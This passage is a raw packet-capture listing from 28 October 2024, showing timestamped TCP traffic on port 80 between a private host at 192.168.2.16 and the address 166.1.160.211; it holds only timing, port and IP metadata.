                                                                                                                                                              Oct 28, 2024 19:46:25.703125954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703142881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703186989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.703572035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703603029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.703656912 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.768891096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.768934965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.768969059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769072056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769123077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769140005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769156933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769170046 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769191027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769197941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769243002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769278049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769284010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769311905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769346952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769352913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769380093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769418955 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769432068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769467115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769510984 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769517899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769552946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769587040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769598961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769623041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769656897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769668102 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769691944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769736052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769743919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769794941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769828081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769838095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769861937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769895077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769902945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769929886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769963980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.769975901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.769999027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770031929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770044088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.770082951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770570993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770603895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.770605087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770639896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770647049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.770692110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770725012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770737886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.770759106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770792961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770801067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.770828962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770864010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.770875931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.818161011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.819533110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819664955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819694996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819713116 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.819746971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819796085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.819799900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819848061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819881916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819894075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.819916010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819962978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.819964886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.819999933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820033073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820049047 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820066929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820100069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820127010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820132971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820184946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820255041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820368052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820401907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820417881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820535898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820569038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820590973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820602894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820637941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820650101 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820672989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820705891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820713997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820739031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820794106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820831060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820863008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820898056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820913076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.820938110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820972919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.820985079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821193933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821228981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821235895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821281910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821315050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821326017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821348906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821382046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821393013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821428061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821475983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821479082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821511984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821544886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821558952 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821578979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821611881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821621895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821646929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821681976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821691990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.821711063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.821758986 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822124958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822192907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822227955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822242022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822261095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822304010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822314978 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822349072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822381973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822397947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822417021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822449923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822462082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822545052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822578907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822592974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822642088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822676897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822694063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822712898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822746038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822761059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822781086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822809935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822835922 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.822957039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.822999001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823007107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823040962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823081970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823134899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823167086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823199987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823215961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823234081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823281050 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823440075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823473930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823508024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823518038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823542118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823575020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823582888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823606968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823642015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823654890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823676109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.823719025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.823929071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.824042082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.824100971 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.825651884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.859230995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859349012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859384060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859417915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859452963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859486103 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859512091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.859512091 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.859570026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859606981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.859622955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859658957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.859674931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.863080025 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887217045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887262106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887330055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887366056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887398958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887406111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887406111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887432098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887450933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887499094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887547016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887550116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887583971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887631893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887676954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887727976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887761116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887779951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887851000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.887903929 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.887937069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888006926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888041019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888058901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888104916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888137102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888158083 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888194084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888238907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888505936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888557911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888592958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888605118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888644934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888678074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888694048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888720036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888768911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.888864994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888947010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888979912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.888991117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889044046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889079094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889096022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889111996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889146090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889163017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889178038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889220953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889429092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889482975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889514923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889527082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889648914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889682055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889692068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889765024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889796972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889811039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889830112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889864922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889878988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889899015 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889934063 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.889942884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.889966965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890001059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890012026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890036106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890085936 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890563011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890597105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890640974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890666008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890698910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890732050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890749931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890765905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890813112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.890819073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890851974 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890886068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.890899897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891155958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891201973 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891207933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891239882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891294956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891297102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891364098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891396999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891412020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891432047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891465902 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891484976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891503096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891535044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891549110 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.891568899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891602993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:25.891613960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:25.892146111 CET8049726166.1.160.211192.168.2.16
